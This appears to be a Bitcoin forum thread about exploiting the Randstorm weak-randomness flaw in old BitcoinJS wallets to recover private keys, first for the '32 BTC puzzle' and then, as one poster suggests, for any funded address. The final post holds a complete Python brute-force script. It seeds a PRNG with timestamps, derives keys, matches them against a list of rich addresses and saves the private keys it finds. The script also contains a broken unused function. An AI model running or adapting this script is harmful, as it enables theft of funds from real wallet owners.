stilichovandal (OP)
Jr. Member
 Offline
Activity: 31
Merit: 5
|
 |
May 17, 2024, 04:17:19 PM |
|
Hi all, I want to present my work in process project ie, to try using Randstorm vulnerabiility for solving the puzzle. Link to the Git repo. https://github.com/Stilichov/Randstorm-for-puzzleThe idea is that, between 2010 and 2015, many exchanges and websites relied on BitcoinJS-lib v0.1.3 for Bitcoin wallet generation. The issue was that many browsers didn't use window.crypto.random, which led to entropy being collected from Math.random(). The Bitcoin Challenge Transaction was created in 2015, and the wallets were created with math.random() I am still trying to replicate the vulnerable math.random() functions used in the older versions of the browser. While the project is still work in progress, I welcome your feedback and ideas to implement the the old math.random() functions. |
|
|
|
|
nomachine
Member
Offline
Activity: 476
Merit: 35
|
|
May 30, 2024, 05:17:39 PM |
|
I have already tried all possible timestamps for 32 BTC Puzzle with this method from start_datetime = datetime(2010, 1, 1, 0, 0, 0) end_datetime = datetime(2015, 1, 15, 19, 7, 14) unfortunately, this puzzle was not created with that tool.  But you can try all other BTC addresses that have a positive balance using the same method. Good luck. |
bc1qdwnxr7s08xwelpjy3cc52rrxg63xsmagv50fa8
|
|
|
stilichovandal (OP)
Jr. Member
Offline
Activity: 31
Merit: 5
|
|
May 30, 2024, 06:41:51 PM |
|
I have already tried all possible timestamps for 32 BTC Puzzle with this method from start_datetime = datetime(2010, 1, 1, 0, 0, 0) end_datetime = datetime(2015, 1, 15, 19, 7, 14) unfortunately, this puzzle was not created with that tool. But you can try all other BTC addresses that have a positive balance using the same method. Good luck. I am still working to implement math.random() as it was used in the older version of browsers. Chrome and Firefox had slightly different methods. Do you already have its implementation? |
|
|
|
|
nomachine
Member
Offline
Activity: 476
Merit: 35
|
|
May 30, 2024, 07:04:36 PM |
|
It's very similar to what you did on github. I don't know what I haven't tried in the last 5 years. Thousands of scripts and experiments. Even different random generators from here https://github.com/schmouk/PyRandLibVarious variants for random seed. Can you imagine that i tried UUID - uuid3() , uuid4() , uuid5() as a random seed ? I even physically turned back time on the PC. |
bc1qdwnxr7s08xwelpjy3cc52rrxg63xsmagv50fa8
|
|
|
COBRAS
Member
Offline
Activity: 1015
Merit: 23
|
|
May 30, 2024, 08:03:08 PM |
|
It's very similar to what you did on github. I don't know what I haven't tried in the last 5 years. Thousands of scripts and experiments. Even different random generators from here https://github.com/schmouk/PyRandLibVarious variants for random seed. Can you imagine that i tried UUID - uuid3() , uuid4() , uuid5() as a random seed ? I even physically turned back time on the PC. I was try this rng https://github.com/lemire/fastrandAnd hi find privkey 2**32 axact ac 2**32 nymbers generated 2**10 exact at 2**10 generated numbers ))))) |
[
|
|
|
Kpot87
Jr. Member
Offline
Activity: 43
Merit: 1
|
|
May 31, 2024, 05:01:51 AM |
|
Anybody know any site that use BitcoinJS-lib in late 2011? Can you show examples?
|
|
|
|
|
|
|
nomachine
Member
Offline
Activity: 476
Merit: 35
|
|
May 31, 2024, 08:30:33 AM
Last edit: May 31, 2024, 09:48:44 AM by nomachine |
|
import random, sys, os
from datetime import datetime, timedelta
import time
import secp256k1 as ice
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
t = time.ctime()
sys.stdout.write(f"\033[?25l")
sys.stdout.write(f"\033[01;33m[+] {t}\n")
sys.stdout.flush()
class SecureRandom:
def __init__(self, seed):
self.rng_state = None
self.rng_pool = []
self.rng_pptr = 0
self.rng_psize = 32
random.seed(seed)
for _ in range(self.rng_psize):
self.rng_pool.append(random.randint(0, 255))
self.rng_pptr = 0
def rng_get_byte(self):
if self.rng_pptr >= len(self.rng_pool):
self.rng_pptr = 0
self.rng_pool = [random.randint(0, 255) for _ in range(self.rng_psize)]
byte = self.rng_pool[self.rng_pptr]
self.rng_pptr += 1
return byte
def rng_get_bytes(self, length):
result = bytearray(length)
for i in range(length):
result[i] = self.rng_get_byte()
return result
def custom_private_key_generator(rng_simulator=None):
# If no random number generator simulator is provided, create a new one
rng = SecureRandom()
private_key_bytes = rng.rng_get_bytes(32)
private_key_hex = private_key_bytes.hex()
return private_key_hex
def generate_address(private_key):
dec = int(private_key, 16)
caddr = ice.privatekey_to_address(0, True, dec)
uaddr = ice.privatekey_to_address(0, False, dec)
return caddr, uaddr
richFile = "richFile.txt"
rl = [iu.strip() for iu in open(richFile).readlines()]
richList = set(rl)
# Specify the start and end date and times
start_datetime = datetime(2013, 11, 1, 0, 0, 0)
end_datetime = datetime(2015, 1, 15, 19, 7, 14)
# Calculate the time range in seconds
time_range_seconds = (end_datetime - start_datetime).total_seconds()
current_datetime = start_datetime
while current_datetime <= end_datetime:
# Format the current datetime to exclude fractional seconds
timestamp = current_datetime.strftime('%Y-%m-%d %H:%M:%S')
# Convert the formatted timestamp to a Unix timestamp
current_seed = int(datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S').timestamp())
# Create a secure random number generator
secure_rng = SecureRandom(current_seed)
random_bytes = secure_rng.rng_get_bytes(32)
hex_representation = random_bytes.hex()
private_key = hex_representation
caddr, uaddr = generate_address(private_key)
message = "\r[+] {}, {}".format(caddr, timestamp);messages = []
messages.append(message);output = "\033[01;33m" + ''.join(messages) + "\r"
sys.stdout.write(output);sys.stdout.flush()
# Check if the generated address matches
if caddr in richList or uaddr in richList:
wifc = ice.btc_pvk_to_wif(private_key)
wifu = ice.btc_pvk_to_wif(private_key, False)
with open("KEYFOUNDKEYFOUND.txt", "a") as file:
file.write("\nPrivate Key (hex): " + private_key)
file.write("\nPrivate key (wif) Compressed : " + wifc)
file.write("\nPrivate key (wif) Uncompressed: " + wifu)
file.write("\nBitcoin address Compressed: " + caddr)
file.write("\nBitcoin address Uncompressed: " + uaddr)
file.write(
"\n-------------------------------------------------------------------------------------------------------------------------------------------\n"
)
current_datetime += timedelta(seconds=1) You can try all possible BTC addresses with this, but I had no luck. Everything has already been hacked that had flaws. |
bc1qdwnxr7s08xwelpjy3cc52rrxg63xsmagv50fa8
|
|
|
|
